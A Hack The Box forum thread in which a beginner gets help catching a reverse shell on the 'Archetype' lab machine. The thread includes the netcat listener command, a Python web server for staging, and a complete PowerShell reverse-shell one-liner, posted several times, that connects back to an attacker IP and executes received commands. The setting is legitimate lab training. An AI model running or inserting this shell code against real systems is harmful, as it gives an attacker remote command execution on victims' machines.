ARCHETYPE listening on any 443 port

i having problem when i run sudo nc -lvnp 443 it types listening on any port

Comments

  • What is the problem?

    Note: I am not going to be available much in September.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • problem is when i run command sudo nc -lvnp 443 it types listening on any port and i lunch script it types listening on [any] 443 ...
    connect to [10.10.14.159] from (UNKNOWN) [10.10.10.27] 49695
    �j٨MTvt���*�,�+�0�/���$�#�(�'�
    � ����=<5/
    7

  • Why is that a problem?

    You run netcat, it acts as a listener. This is clearly working.

    The listener has had a connection from a server on 10.10.10.27 but the data sent by the server isn't something netcat easily understands.

    How are you getting the server to connect to your listener? Are you sending binary data? Have you used a meterpreter payload? (if so you might be better using MSF to catch the shell).

    Note: I am not going to be available much in September.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • no bro i didnt use msf

  • @GHOSTanonymus said:

    no bro i didnt use msf

    OK - is your python webserver getting a hit?

    Note: I am not going to be available much in September.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • u think mssqlclient.py?

  • or python -m http.server 80

  • its all working on it

  • i watched many tutorials but nothing

  • Type your comment> @TazWake said:

    Why is that a problem?

    You run netcat, it acts as a listener. This is clearly working.

    The listener has had a connection from a server on 10.10.10.27 but the data sent by the server isn't something netcat easily understands.

    How are you getting the server to connect to your listener? Are you sending binary data? Have you used a meterpreter payload? (if so you might be better using MSF to catch the shell).

    problem is bro that it dont want to lunch shell

  • If you follow the instructions for Archetype, it says:

    • create shell.ps1 (it should be $client = New-Object System.Net.Sockets.TCPClient("YOURIP",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
    • set up a python webserver with python3 -m http.server 80 (may need sudo)
    • set up your netcat listener sudo nc -lvnp 443
    • use the SQLi to call the shell.ps1 and invoke it (this triggers a content block on the HTB WAF so I am not going to paste it in here)

    Note: I am not going to be available much in September.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • this is brainfuck for me

  • Just take it slow and make sure you are following every step in the walkthrough.

    Its worth hitting websearches for anything you dont understand.

    There are loads of online resources, and there is so much to cover in Pentesting/CTFs that no one knows everything.

    Some links you might want to check (disclaimer : I haven't checked any of these to know if they are any good).

    https://www.youtube.com/watch?v=Iwrr75U4xYs
    https://www.youtube.com/watch?v=GmSJus6PyV4
    https://www.sans.org/reading-room/whitepapers/testing/paper/266
    https://www.tutorialspoint.com/penetration_testing/penetration_testing_introduction.htm

    And I'd strongly recommend reading walkthroughs for retired boxes or watching Ippsec's YouTube channel.

    Pentesting/CTFs and "hacking" requires some background knowledge to get started. Dont be misled into thinking its just something you "do" with a couple of clicks. You need to understand what is happening on your system and the target system to have any hope.

    Note: I am not going to be available much in September.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • If you follow the instructions for Archetype, it says:

    create shell.ps1 (it should be $client = New-Object System.Net.Sockets.TCPClient("YOURIP",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
    set up a python webserver with python3 -m http.server 80 (may need sudo)
    set up your netcat listener sudo nc -lvnp 443
    use the SQLi to call the shell.ps1 and invoke it (this triggers a content block on the HTB WAF so I am not going to paste it in here)
    Yes it is u do all u say
  • I think i need to run ufw command after sudo nc - lvnp 443
  • @GHOSTanonymus said:

    I think i need to run ufw command after sudo nc - lvnp 443

    Possibly but you appear to be getting a connection. The UFW command is to stop your Linux firewall blocking the reverse shell.

    Note: I am not going to be available much in September.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • yeah bro my firewall is disabled

  • The same thing is also happening with my firewall is disabled, Netcat listener is set up , the server is also but nothing happens after running on the netcat listener .I have been banging my head on this for 2 days watched tutorial after tutorials but no cure for my problem

  • i solved this bro

  • edited March 14

    if type just runin on any 443 port than lunch script from htb starting point tutorial
    i mean this $client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

  • run that as command in sql shell

  • i hope i helped u bro

  • Type your comment> @GHOSTanonymus said:

    if type just runin on any 443 port than lunch script from htb starting point tutorial
    i mean this $client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

    I don't understand what are you trying to tell me, I think that's what the tutorial tells us to do. I mean run it as an SQL command.I did it but I don't know why it won't show connect in the listener still

  • Bro when u set up listener and server run command pythont3 mssqlclient.py ARCHETYPE...
  • And then all from htv tutorial
  • And then $client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Sign In to comment.